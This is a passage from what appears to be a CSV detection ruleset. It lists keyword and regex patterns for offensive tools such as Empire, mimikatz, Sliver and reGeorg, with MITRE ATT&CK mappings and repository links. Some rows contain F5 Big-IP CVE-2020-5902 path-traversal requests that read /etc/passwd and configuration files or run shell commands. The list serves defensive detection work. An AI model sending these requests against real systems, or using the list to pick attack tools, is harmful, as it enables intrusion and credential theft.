- T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_mozillarhino2*",".{0,1000}generate_mozillarhino2.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_payload(language, ip, port)*",".{0,1000}generate_payload\(language,\sip,\sport\).{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*generate_powershell operation1*",".{0,1000}generate_powershell\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_powershell_exe*",".{0,1000}generate_powershell_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_powershell_shellcode*",".{0,1000}generate_powershell_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_python_exe*",".{0,1000}generate_python_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_python_shellcode*",".{0,1000}generate_python_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_raw_payload*",".{0,1000}generate_raw_payload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*generate_spoofed_args_exe*",".{0,1000}generate_spoofed_args_exe.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_stageless*",".{0,1000}generate_stageless.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_unmanaged_exe operation1 *.exe",".{0,1000}generate_unmanaged_exe\soperation1\s.{0,1000}\.exe","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_x64_shellcode*",".{0,1000}generate_x64_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_x86_shellcode*",".{0,1000}generate_x86_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*Generated random password for socks proxy:*",".{0,1000}Generated\srandom\spassword\sfor\ssocks\sproxy\:.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*Generated shellcode successfully saved in file *",".{0,1000}Generated\sshellcode\ssuccessfully\ssaved\sin\sfile\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*GenerateDllBase64Hta*",".{0,1000}GenerateDllBase64Hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateExeBase64*",".{0,1000}GenerateExeBase64.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateForcedBrowseWordlist.py*",".{0,1000}GenerateForcedBrowseWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*generateInjectBinFile*",".{0,1000}generateInjectBinFile.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Generate-Macro.ps1*",".{0,1000}Generate\-Macro\.ps1.{0,1000}","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","7","671","208","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z" "*GenerateParameterWordlist.py*",".{0,1000}GenerateParameterWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*GenerateReverseTcpDrone*",".{0,1000}GenerateReverseTcpDrone.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*generate-rotating-beacon.*",".{0,1000}generate\-rotating\-beacon\..{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*GeneratesShellcodeFromPEorDll*",".{0,1000}GeneratesShellcodeFromPEorDll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Generating sliver binary for *",".{0,1000}Generating\ssliver\sbinary\sfor\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Generator IP@Login;Password*",".{0,1000}Generator\sIP\@Login\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*GenericC2Relay.cs*",".{0,1000}GenericC2Relay\.cs.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*Genetic-Malware/Ebowla*",".{0,1000}Genetic\-Malware\/Ebowla.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*genMalDoc()*",".{0,1000}genMalDoc\(\).{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*genmkvpwd *",".{0,1000}genmkvpwd\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*gentilkiwi (Benjamin DELPY)*",".{0,1000}gentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*gentilkiwi*",".{0,1000}gentilkiwi.{0,1000}","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Georg is not ready, please check url*",".{0,1000}Georg\sis\snot\sready,\splease\scheck\surl.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*Georg says, 'All seems fine'*",".{0,1000}Georg\ssays,\s\'All\sseems\sfine\'.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*GeorgePatsias/ScareCrow*",".{0,1000}GeorgePatsias\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","446","69","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" "*georgesotiriadis/Chimera*",".{0,1000}georgesotiriadis\/Chimera.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*",".{0,1000}geowordlists\s\-\-postal\-code\s75001\s\-\-kilometers\s25\s\-\-output\-file\s\/tmp\/around_paris\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*",".{0,1000}GET\s.{0,1000}\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/hosts.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.conf.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.license.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*",".{0,1000}GET\s.{0,1000}https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=whoami.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*get_beacon(*",".{0,1000}get_beacon\(.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 